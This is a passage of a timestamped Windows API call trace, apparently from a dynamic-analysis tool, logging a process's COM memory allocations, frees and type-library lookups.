[0031.362] IMalloc:Free (This=0x7fefe015380, pv=0x76dc380) [0031.362] IMalloc:Free (This=0x7fefe015380, pv=0x76dc3c0) [0031.362] IMalloc:Free (This=0x7fefe015380, pv=0x76dc400) [0031.362] IMalloc:Free (This=0x7fefe015380, pv=0x76dc440) [0031.362] IMalloc:Free (This=0x7fefe015380, pv=0x76dc480) [0031.363] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e69b0 [0031.363] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e69b0) returned 0x40 [0031.364] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e69b0 [0031.364] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e69b0) returned 0x40 [0031.364] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.364] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.364] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918b0 [0031.364] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4918b0) returned 0x10 [0031.365] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.365] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.365] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e69b0 [0031.365] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e69b0) returned 0x40 [0031.365] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4918b0 [0031.365] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4918b0) returned 0x18 [0031.365] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918b0 [0031.365] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4918b0) returned 0x10 [0031.366] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4918b0 [0031.366] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4918b0) returned 0x18 [0031.366] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ea0 [0031.366] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x28 [0031.366] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ea0 [0031.366] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x28 [0031.366] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ea0 [0031.366] IMalloc:GetSize (This=0x7fefe015380, pv=0x7666ea0) returned 0x28 [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491050) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491390) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491670) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb4915b0) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb4914f0) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491970) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491850) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb4913b0) [0031.366] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0xb4913d0) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0xb515760) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x76dc480) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x76dc440) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7665f10) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7665f40) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x76dc400) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7665f70) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7665fa0) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7665fd0) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7666000) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7666ff0) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x76660c0) [0031.367] IMalloc:Free (This=0x7fefe015380, pv=0x7667050) [0031.367] ITypeInfo:GetImplTypeFlags (in: This=0xb4ceae0, index=0x0, pImplTypeFlags=0x2e6948 | out: pImplTypeFlags=0x2e6948*=1) returned 0x0 [0031.367] IUnknown:Release (This=0x780bd08) returned 0x2 [0031.367] ITypeInfo:GetImplTypeFlags (in: This=0xb4ceae0, index=0x1, pImplTypeFlags=0x2e694c | out: pImplTypeFlags=0x2e694c*=3) returned 0x0 [0031.367] IUnknown:Release (This=0x780c6c8) returned 0x2 [0031.367] IUnknown:Release (This=0xb4cda08) returned 0x1 [0031.367] IUnknown:Release (This=0xb4cea88) returned 0x1 [0031.367] IUnknown:Release (This=0xb4ceae0) returned 0x1 [0031.367] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x61, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ceb90) returned 0x0 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc400 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7667050 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76660c0 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x32) returned 0x76dc440 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ff0 [0031.367] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc480 [0031.368] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666000 [0031.368] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7665fd0 [0031.368] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7665fa0 [0031.368] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7665f70 [0031.368] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7665f40 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7665f10 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666ea0 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc3c0 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dc380 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666f90 [0031.373] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76663c0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666390 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666360 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7666300 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76662d0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc340 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc280 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76662a0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666270 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc2c0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666210 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x76661e0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76661b0 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666180 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666150 [0031.374] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76660f0 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x766d2c0 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666480 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666450 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666c60 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc300 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc240 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc200 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc1c0 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666060 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666cf0 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666090 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76665d0 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc180 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x2e) returned 0x76dc140 [0031.375] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76665a0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666570 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666540 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76664e0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76664b0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666630 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666660 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666690 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76666c0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x76666f0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666750 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666780 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x76667b0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x76667e0 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666810 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666840 [0031.376] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc100 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc0c0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76668a0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x76668d0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc080 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x2c) returned 0x76dc040 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666900 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666930 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666960 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666990 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x76669f0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666a50 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666a80 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666ab0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666ae0 [0031.377] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666b10 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x1e) returned 0x7666b70 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666ba0 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x1a) returned 0x7666bd0 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666c00 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x22) returned 0x7666d20 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666d50 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x1c) returned 0x7666db0 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x26) returned 0x7666de0 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7666e70 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667110 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x2a) returned 0x76dc000 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7667020 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x24) returned 0x7666f60 [0031.378] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0xb515760 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491510 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913d0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491490 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a30 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913b0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491850 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491970 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914f0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915b0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491670 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491390 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491050 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918b0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491790 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919b0 [0031.379] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491290 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491590 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4919d0 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491410 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491950 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491730 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fd0 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491870 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916f0 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491830 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490ff0 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491610 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490fb0 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491710 [0031.380] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491010 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491990 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916d0 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4914d0 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4913f0 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491890 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490d90 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a10 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491a90 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491650 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490e30 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4916b0 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491690 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491750 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491910 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4917f0 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490f30 [0031.381] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491450 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491ab0 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4918f0 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491070 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491570 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb491470 [0031.382] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb4915d0 [0031.382] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x18 [0031.393] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.393] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.393] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.393] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.394] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.394] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.394] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667680 [0031.394] IMalloc:GetSize (This=0x7fefe015380, pv=0x7667680) returned 0x20 [0031.397] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76dbfc0 [0031.397] IMalloc:GetSize (This=0x7fefe015380, pv=0x76dbfc0) returned 0x30 [0031.397] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e6af0 [0031.397] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4e6af0) returned 0x48 [0031.398] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.400] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.401] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.401] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.401] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.401] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.401] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.401] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.401] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.401] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.402] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.402] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.402] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.402] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.402] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.402] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.402] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.402] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.403] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.403] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.403] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.403] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.403] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.403] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.403] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.403] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.403] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.403] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.404] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.404] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.404] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.404] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.404] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.404] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.404] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.404] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.404] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.404] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.405] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.405] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.405] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.405] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.405] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.405] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.406] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.406] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.406] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.406] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.406] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.406] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.407] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.407] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.407] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.407] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.407] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.407] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.407] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.407] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.407] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.407] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.408] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.408] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.408] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.408] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.408] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.408] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.408] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.408] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.408] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.408] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.409] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.409] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.409] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.409] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.409] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.409] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.409] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.409] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.410] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.410] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.410] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.410] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.410] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.410] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.410] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.410] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.411] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4915d0 [0031.411] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4915d0) returned 0x10 [0031.412] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f63f0 [0031.412] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f63f0) returned 0x8 [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4919d0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491750) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491510) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491a30) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491730) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4913d0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb4913b0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb490fd0) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491490) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491850) [0031.415] IMalloc:Free (This=0x7fefe015380, pv=0xb491410) [0031.415] 